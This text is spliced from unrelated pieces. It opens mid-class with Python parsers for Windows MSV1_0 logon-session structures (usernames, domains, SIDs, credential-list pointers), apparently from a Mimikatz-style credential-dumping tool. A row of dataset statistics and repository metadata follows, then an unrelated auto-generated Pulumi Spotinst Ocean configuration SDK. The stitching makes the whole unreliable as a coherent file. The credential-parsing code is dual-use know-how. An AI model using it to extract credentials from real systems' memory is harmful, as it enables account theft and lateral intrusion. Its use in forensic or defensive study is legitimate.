res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
res.unk24 = await ULONG.loadvalue(reader)
res.unk25 = await ULONG.loadvalue(reader)
res.unk26 = await ULONG.loadvalue(reader)
await reader.align()
res.unk27 = await PVOID.loadvalue(reader)
res.unk28 = await PVOID.loadvalue(reader)
res.unk29 = await PVOID.loadvalue(reader)
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_63(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_63()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_63
return p
class KIWI_MSV1_0_LIST_63:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.waza = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.Type = None
self.pSid = None
self.LogonType = None
self.unk18 = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.unk24 = None
self.unk25 = None
self.unk26 = None
self.unk27 = None
self.unk28 = None
self.unk29 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_63()
res.Flink = await PKIWI_MSV1_0_LIST_63.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_63.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
await reader.align()
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.waza = await reader.read(12)
await reader.align()
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.Type = await LSA_UNICODE_STRING.load(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
await reader.align()
res.unk18 = await PVOID.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
res.unk24 = await ULONG.loadvalue(reader)
res.unk25 = await ULONG.loadvalue(reader)
res.unk26 = await ULONG.loadvalue(reader)
await reader.align()
#input('CredentialManager\n' + hexdump(reader.peek(0x100)))
res.unk27 = await PVOID.loadvalue(reader)
res.unk28 = await PVOID.loadvalue(reader)
res.unk29 = await PVOID.loadvalue(reader)
res.CredentialManager = await PVOID.load(reader)
return res | 33.445725 | 120 | 0.748887 | 4,790 | 34,817 | 5.269102 | 0.064092 | 0.089702 | 0.104838 | 0.072309 | 0.907286 | 0.883593 | 0.853679 | 0.816633 | 0.78561 | 0.756805 | 0 | 0.045288 | 0.152081 | 34,817 | 1,041 | 121 | 33.445725 | 0.809633 | 0.021139 | 0 | 0.805348 | 0 | 0.013904 | 0.029844 | 0.025115 | 0 | 0 | 0.000705 | 0 | 0 | 1 | 0.026738 | false | 0.068449 | 0.004278 | 0 | 0.083422 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
1bd1cb0d628d618b8c01369a12188e64043924f6 | 81,160 | py | Python | sdk/python/pulumi_spotinst/aws/ocean.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2019-12-21T20:50:43.000Z | 2021-12-01T20:57:38.000Z | sdk/python/pulumi_spotinst/aws/ocean.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 103 | 2019-12-09T22:03:16.000Z | 2022-03-30T17:07:34.000Z | sdk/python/pulumi_spotinst/aws/ocean.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OceanArgs', 'Ocean']
@pulumi.input_type
class OceanArgs:
def __init__(__self__, *,
security_groups: pulumi.Input[Sequence[pulumi.Input[str]]],
subnet_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input['OceanAutoscalerArgs']] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]] = None,
logging: Optional[pulumi.Input['OceanLoggingArgs']] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]] = None,
update_policy: Optional[pulumi.Input['OceanUpdatePolicyArgs']] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Ocean resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input['OceanAutoscalerArgs'] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EBS service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If no Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input['OceanInstanceMetadataOptionsArgs'] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach the instances.
:param pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]] load_balancers: Array of load balancer objects to add to the Ocean cluster.
:param pulumi.Input['OceanLoggingArgs'] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in Gb) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[bool] use_as_template_only: When set to true, the launch specification defined on the Ocean object functions only as a template for virtual node groups.
In that case, on Ocean resource creation make sure your custom VNG has an initial_nodes parameter so that nodes are created for your VNG.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
pulumi.set(__self__, "security_groups", security_groups)
pulumi.set(__self__, "subnet_ids", subnet_ids)
if associate_public_ip_address is not None:
pulumi.set(__self__, "associate_public_ip_address", associate_public_ip_address)
if autoscaler is not None:
pulumi.set(__self__, "autoscaler", autoscaler)
if blacklists is not None:
pulumi.set(__self__, "blacklists", blacklists)
if controller_id is not None:
pulumi.set(__self__, "controller_id", controller_id)
if desired_capacity is not None:
pulumi.set(__self__, "desired_capacity", desired_capacity)
if draining_timeout is not None:
pulumi.set(__self__, "draining_timeout", draining_timeout)
if ebs_optimized is not None:
pulumi.set(__self__, "ebs_optimized", ebs_optimized)
if fallback_to_ondemand is not None:
pulumi.set(__self__, "fallback_to_ondemand", fallback_to_ondemand)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if iam_instance_profile is not None:
pulumi.set(__self__, "iam_instance_profile", iam_instance_profile)
if image_id is not None:
pulumi.set(__self__, "image_id", image_id)
if instance_metadata_options is not None:
pulumi.set(__self__, "instance_metadata_options", instance_metadata_options)
if key_name is not None:
pulumi.set(__self__, "key_name", key_name)
if load_balancers is not None:
pulumi.set(__self__, "load_balancers", load_balancers)
if logging is not None:
pulumi.set(__self__, "logging", logging)
if max_size is not None:
pulumi.set(__self__, "max_size", max_size)
if min_size is not None:
pulumi.set(__self__, "min_size", min_size)
if monitoring is not None:
pulumi.set(__self__, "monitoring", monitoring)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if root_volume_size is not None:
pulumi.set(__self__, "root_volume_size", root_volume_size)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if spot_percentage is not None:
pulumi.set(__self__, "spot_percentage", spot_percentage)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if update_policy is not None:
pulumi.set(__self__, "update_policy", update_policy)
if use_as_template_only is not None:
pulumi.set(__self__, "use_as_template_only", use_as_template_only)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if utilize_commitments is not None:
pulumi.set(__self__, "utilize_commitments", utilize_commitments)
if utilize_reserved_instances is not None:
pulumi.set(__self__, "utilize_reserved_instances", utilize_reserved_instances)
if whitelists is not None:
pulumi.set(__self__, "whitelists", whitelists)
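# Illustrative sketch (not part of the generated SDK): only security_groups and subnet_ids
# are required above; every other argument is optional and is simply skipped when left as
# None. The identifiers below are placeholder values, not real AWS resources.
#
# args = OceanArgs(
# security_groups=["sg-0123456789abcdef0"],
# subnet_ids=["subnet-0123456789abcdef0"],
# region="us-west-2",
# min_size=1,
# max_size=10,
# )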
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
One or more security group ids.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "security_groups", value)
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Configure public IP address allocation.
"""
return pulumi.get(self, "associate_public_ip_address")
@associate_public_ip_address.setter
def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_public_ip_address", value)
@property
@pulumi.getter
def autoscaler(self) -> Optional[pulumi.Input['OceanAutoscalerArgs']]:
"""
Describes the Ocean Kubernetes Auto Scaler.
"""
return pulumi.get(self, "autoscaler")
@autoscaler.setter
def autoscaler(self, value: Optional[pulumi.Input['OceanAutoscalerArgs']]):
pulumi.set(self, "autoscaler", value)
@property
@pulumi.getter
def blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
"""
return pulumi.get(self, "blacklists")
@blacklists.setter
def blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "blacklists", value)
@property
@pulumi.getter(name="controllerId")
def controller_id(self) -> Optional[pulumi.Input[str]]:
"""
A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
"""
return pulumi.get(self, "controller_id")
@controller_id.setter
def controller_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "controller_id", value)
@property
@pulumi.getter(name="desiredCapacity")
def desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The number of instances to launch and maintain in the cluster.
"""
return pulumi.get(self, "desired_capacity")
@desired_capacity.setter
def desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "desired_capacity", value)
@property
@pulumi.getter(name="drainingTimeout")
def draining_timeout(self) -> Optional[pulumi.Input[int]]:
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
return pulumi.get(self, "draining_timeout")
@draining_timeout.setter
def draining_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "draining_timeout", value)
@property
@pulumi.getter(name="ebsOptimized")
def ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EBS service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
"""
return pulumi.get(self, "ebs_optimized")
@ebs_optimized.setter
def ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ebs_optimized", value)
@property
@pulumi.getter(name="fallbackToOndemand")
def fallback_to_ondemand(self) -> Optional[pulumi.Input[bool]]:
"""
If no Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
"""
return pulumi.get(self, "fallback_to_ondemand")
@fallback_to_ondemand.setter
def fallback_to_ondemand(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_to_ondemand", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after the instance has launched to start checking its health.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter(name="iamInstanceProfile")
def iam_instance_profile(self) -> Optional[pulumi.Input[str]]:
"""
The instance profile iam role.
"""
return pulumi.get(self, "iam_instance_profile")
@iam_instance_profile.setter
def iam_instance_profile(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "iam_instance_profile", value)
@property
@pulumi.getter(name="imageId")
def image_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the image used to launch the instances.
"""
return pulumi.get(self, "image_id")
@image_id.setter
def image_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_id", value)
@property
@pulumi.getter(name="instanceMetadataOptions")
def instance_metadata_options(self) -> Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]:
"""
Ocean instance metadata options object for IMDSv2.
"""
return pulumi.get(self, "instance_metadata_options")
@instance_metadata_options.setter
def instance_metadata_options(self, value: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]):
pulumi.set(self, "instance_metadata_options", value)
@property
@pulumi.getter(name="keyName")
def key_name(self) -> Optional[pulumi.Input[str]]:
"""
The key pair to attach to the instances.
"""
return pulumi.get(self, "key_name")
@key_name.setter
def key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_name", value)
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]:
"""
Array of load balancer objects to add to the Ocean cluster.
"""
return pulumi.get(self, "load_balancers")
@load_balancers.setter
def load_balancers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]):
pulumi.set(self, "load_balancers", value)
@property
@pulumi.getter
def logging(self) -> Optional[pulumi.Input['OceanLoggingArgs']]:
"""
Logging configuration.
"""
return pulumi.get(self, "logging")
@logging.setter
def logging(self, value: Optional[pulumi.Input['OceanLoggingArgs']]):
pulumi.set(self, "logging", value)
@property
@pulumi.getter(name="maxSize")
def max_size(self) -> Optional[pulumi.Input[int]]:
"""
The upper limit of instances the cluster can scale up to.
"""
return pulumi.get(self, "max_size")
@max_size.setter
def max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_size", value)
@property
@pulumi.getter(name="minSize")
def min_size(self) -> Optional[pulumi.Input[int]]:
"""
The lower limit of instances the cluster can scale down to.
"""
return pulumi.get(self, "min_size")
@min_size.setter
def min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_size", value)
@property
@pulumi.getter
def monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Enable detailed monitoring for the cluster. This flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
return pulumi.get(self, "monitoring")
@monitoring.setter
def monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "monitoring", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Required if type is set to `CLASSIC`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region the cluster will run in.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="rootVolumeSize")
def root_volume_size(self) -> Optional[pulumi.Input[int]]:
"""
The size (in GB) to allocate for the root volume. Minimum `20`.
"""
return pulumi.get(self, "root_volume_size")
@root_volume_size.setter
def root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "root_volume_size", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]:
"""
Set scheduling object.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="spotPercentage")
def spot_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of Spot instances that would spin up from the `desired_capacity` number.
"""
return pulumi.get(self, "spot_percentage")
@spot_percentage.setter
def spot_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "spot_percentage", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]:
"""
Optionally adds tags to instances launched in an Ocean cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="updatePolicy")
def update_policy(self) -> Optional[pulumi.Input['OceanUpdatePolicyArgs']]:
return pulumi.get(self, "update_policy")
@update_policy.setter
def update_policy(self, value: Optional[pulumi.Input['OceanUpdatePolicyArgs']]):
pulumi.set(self, "update_policy", value)
@property
@pulumi.getter(name="useAsTemplateOnly")
def use_as_template_only(self) -> Optional[pulumi.Input[bool]]:
"""
When set to `true`, the launch specification defined on the Ocean object functions only as a template for virtual node groups (VNGs).
In that case, make sure each custom VNG defines an `initial_nodes` parameter so that nodes are created for the VNG when the Ocean resource is created.
"""
return pulumi.get(self, "use_as_template_only")
@use_as_template_only.setter
def use_as_template_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_as_template_only", value)
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[pulumi.Input[str]]:
"""
Base64-encoded MIME user data to make available to the instances.
"""
return pulumi.get(self, "user_data")
@user_data.setter
def user_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_data", value)
@property
@pulumi.getter(name="utilizeCommitments")
def utilize_commitments(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "utilize_commitments")
@utilize_commitments.setter
def utilize_commitments(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_commitments", value)
@property
@pulumi.getter(name="utilizeReservedInstances")
def utilize_reserved_instances(self) -> Optional[pulumi.Input[bool]]:
"""
If Reserved instances exist, Ocean will utilize them before launching Spot instances.
"""
return pulumi.get(self, "utilize_reserved_instances")
@utilize_reserved_instances.setter
def utilize_reserved_instances(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_reserved_instances", value)
@property
@pulumi.getter
def whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
return pulumi.get(self, "whitelists")
@whitelists.setter
def whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "whitelists", value)
@pulumi.input_type
class _OceanState:
def __init__(__self__, *,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input['OceanAutoscalerArgs']] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]] = None,
logging: Optional[pulumi.Input['OceanLoggingArgs']] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]] = None,
update_policy: Optional[pulumi.Input['OceanUpdatePolicyArgs']] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering Ocean resources.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input['OceanAutoscalerArgs'] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS-optimized instances for the cluster. This flag enables optimized capacity for high-bandwidth connectivity to the EBS service for instance types that are not EBS-optimized. For instances that are EBS-optimized, this flag is ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If no Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile IAM role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input['OceanInstanceMetadataOptionsArgs'] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach to the instances.
:param pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]] load_balancers: Array of load balancer objects to add to the Ocean cluster.
:param pulumi.Input['OceanLoggingArgs'] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for the cluster. This flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in GB) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[bool] use_as_template_only: When set to `true`, the launch specification defined on the Ocean object functions only as a template for virtual node groups (VNGs).
       In that case, make sure each custom VNG defines an `initial_nodes` parameter so that nodes are created for the VNG when the Ocean resource is created.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
